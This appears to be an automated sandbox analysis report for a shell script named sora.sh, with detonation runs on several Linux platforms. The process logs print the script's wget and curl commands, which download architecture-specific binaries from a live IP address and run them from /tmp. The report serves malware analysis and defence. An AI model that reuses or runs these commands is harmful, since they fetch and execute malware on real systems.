Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file sora.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian12-armhf-20240418-en
Max time kernel
299s
Max time network
302s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-timedated.service-eNtkgh]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-ntpsec.service-2Kyxb8 systemd-private-8ffd8fa5f590458db2f2d2d4ae1d5ad3-systemd-logind.service-kmb6wG]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-5 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian12-mipsel-20240221-en
Max time kernel
300s
Max time network
298s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-timedated.service-vrdggE]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x robben sora.sh systemd-private-a002f4be3a85462fa06be44a632f6406-systemd-logind.service-rSB2an]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-0 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian9-armhf-20240611-en
Max time kernel
300s
Max time network
286s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-yLlaTN]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
295s
Max time network
297s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x gdm3-config-err-gfb7nI robben snap-private-tmp sora.sh systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| GB | 185.125.190.81:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.163:80 | se.archive.ubuntu.com | tcp |
| US | 8.8.8.8:53 | _http._tcp.saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | _http._tcp.chuangtzu.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | chuangtzu.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | chuangtzu.ftp.acc.umu.se | udp |
| US | 1.1.1.1:53 | saimei.ftp.acc.umu.se | udp |
| US | 1.1.1.1:53 | chuangtzu.ftp.acc.umu.se | udp |
| US | 1.1.1.1:53 | chuangtzu.ftp.acc.umu.se | udp |
| SE | 194.71.11.167:80 | chuangtzu.ftp.acc.umu.se | tcp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| US | 8.8.8.8:53 | saimei.ftp.acc.umu.se | udp |
| SE | 194.71.11.138:80 | saimei.ftp.acc.umu.se | tcp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
299s
Max time network
295s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-timedated.service-BromBo systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-QIRJD0 gdm3-config-err-wcrE8Z robben snap-private-tmp sora.sh systemd-private-63b463d3ddba46c5ba725f65aeb475e2-ModemManager.service-TEoeYq systemd-private-63b463d3ddba46c5ba725f65aeb475e2-colord.service-wvHScB systemd-private-63b463d3ddba46c5ba725f65aeb475e2-polkit.service-UYaRS8 systemd-private-63b463d3ddba46c5ba725f65aeb475e2-power-profiles-daemon.service-3glfDe systemd-private-63b463d3ddba46c5ba725f65aeb475e2-switcheroo-control.service-FGLkHU systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-logind.service-u4tSEY systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-oomd.service-tBUdsa systemd-private-63b463d3ddba46c5ba725f65aeb475e2-systemd-resolved.service-cCtFlD systemd-private-63b463d3ddba46c5ba725f65aeb475e2-upower.service-GUSHRK]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.54:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 91.189.91.81:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.165:80 | se.archive.ubuntu.com | tcp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
debian9-mipsbe-20240418-en
Max time kernel
300s
Max time network
283s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
